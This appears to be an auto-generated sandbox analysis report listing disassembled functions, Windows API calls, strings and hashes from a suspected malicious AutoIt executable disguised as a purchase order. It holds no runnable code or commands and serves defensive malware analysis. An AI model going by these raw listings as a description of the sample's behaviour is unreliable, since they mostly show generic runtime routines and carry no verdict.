                                  • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                  • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                  • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                  Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSysColor.USER32(0000000F), ref: 0044A05E
                                  • GetClientRect.USER32(?,?), ref: 0044A0D1
                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                  • 74286110.USER32(?), ref: 0044A0F6
                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                  • 7427A480.USER32(?,?), ref: 0044A11B
                                  • GetSysColor.USER32(0000000F), ref: 0044A131
                                  • 742845F0.USER32(?,000000F0), ref: 0044A140
                                  • GetSysColor.USER32(0000000F), ref: 0044A14F
                                  • GetSysColor.USER32(00000005), ref: 0044A15B
                                  • 74286110.USER32(?), ref: 0044A1BE
                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                  • 7427A480.USER32(?,00000000), ref: 0044A229
                                  • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                  • GetSysColor.USER32(00000008), ref: 0044A265
                                  • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                  • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                  • GetStockObject.GDI32(00000005), ref: 0044A28A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Color$Pixel$742774286110A480$742845ClientMessageModeObjectRectSendStockText
                                  • String ID:
                                  • API String ID: 1532117962-0
                                  • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                  • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                  • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                  • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                  Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                  • __mtterm.LIBCMT ref: 00417C34
                                    • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                    • Part of subcall function 004178FF: RtlDeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                    • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                    • Part of subcall function 004178FF: RtlDeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                  • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                  • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                  • __init_pointers.LIBCMT ref: 00417CE6
                                  • __calloc_crt.LIBCMT ref: 00417D54
                                  • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                  • API String ID: 4163708885-3819984048
                                  • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                  • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                  • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                  • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                  Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: >>>AUTOIT SCRIPT<<<$\
                                  • API String ID: 0-1896584978
                                  • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                  • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                  • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                  • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                  Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$IconLoad
                                  • String ID: blank$info$question$stop$warning
                                  • API String ID: 2485277191-404129466
                                  • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                  • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                  • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                  • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                  Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadIconW.USER32(?,00000063), ref: 0045464C
                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                  • SetWindowTextW.USER32(?,?), ref: 00454678
                                  • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                  • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                  • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                  • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                  • GetWindowRect.USER32(?,?), ref: 004546F5
                                  • SetWindowTextW.USER32(?,?), ref: 00454765
                                  • GetDesktopWindow.USER32 ref: 0045476F
                                  • GetWindowRect.USER32(00000000), ref: 00454776
                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                  • GetClientRect.USER32(?,?), ref: 004547D2
                                  • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                  • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                  • String ID:
                                  • API String ID: 3869813825-0
                                  • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                  • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                  • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                  • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                  Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcslen.LIBCMT ref: 00464B28
                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                  • _wcslen.LIBCMT ref: 00464C28
                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                  • _wcslen.LIBCMT ref: 00464CBA
                                  • _wcslen.LIBCMT ref: 00464CD0
                                  • _wcslen.LIBCMT ref: 00464CEF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$Directory$CurrentSystem
                                  • String ID: D
                                  • API String ID: 1914653954-2746444292
                                  • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                  • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                  • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                  • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                  Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsicoll
                                  • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                  • API String ID: 3832890014-4202584635
                                  • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                  • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                  • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                  • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                  Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                  Download Yara Rule
                                  APIs
                                  • 74285CF0.USER32(?), ref: 004558E3
                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285CreateWindow
                                  • String ID: ,$tooltips_class32
                                  • API String ID: 1109741162-3856767331
                                  • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                  • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                  • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                  • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                  Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                  • GetMenuItemCount.USER32(?), ref: 00468C45
                                  • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                  • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                  • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                  • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                  • GetMenuItemCount.USER32 ref: 00468CFD
                                  • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                  • GetCursorPos.USER32(?), ref: 00468D3F
                                  • SetForegroundWindow.USER32(?), ref: 00468D49
                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                  • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                  • String ID: 0
                                  • API String ID: 1441871840-4108050209
                                  • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                  • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                  • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                  • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                  Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                  • __swprintf.LIBCMT ref: 00460915
                                  • __swprintf.LIBCMT ref: 0046092D
                                  • _wprintf.LIBCMT ref: 004609E1
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                  • API String ID: 3631882475-2268648507
                                  • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                  • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                  • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                  • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                  Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                  • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                  • SendMessageW.USER32 ref: 00471740
                                  • 6FDA2980.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                  • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                  • 6FDA2980.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                  • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                  • 6FD9C400.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                  • 6FD9C400.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                  • SendMessageW.USER32 ref: 0047184F
                                  • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                  • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                  • DestroyCursor.USER32(?), ref: 0047189C
                                  • DestroyCursor.USER32(?), ref: 004718A2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$A2980C400CursorDestroyExtractIcon
                                  • String ID:
                                  • API String ID: 2591440241-0
                                  • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                  • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                  • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                  • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                  Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                  • _wcslen.LIBCMT ref: 00461683
                                  • __swprintf.LIBCMT ref: 00461721
                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                  • GetDlgCtrlID.USER32(?), ref: 00461869
                                  • GetWindowRect.USER32(?,?), ref: 004618A4
                                  • GetParent.USER32(?), ref: 004618C3
                                  • ScreenToClient.USER32(00000000), ref: 004618CA
                                  • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
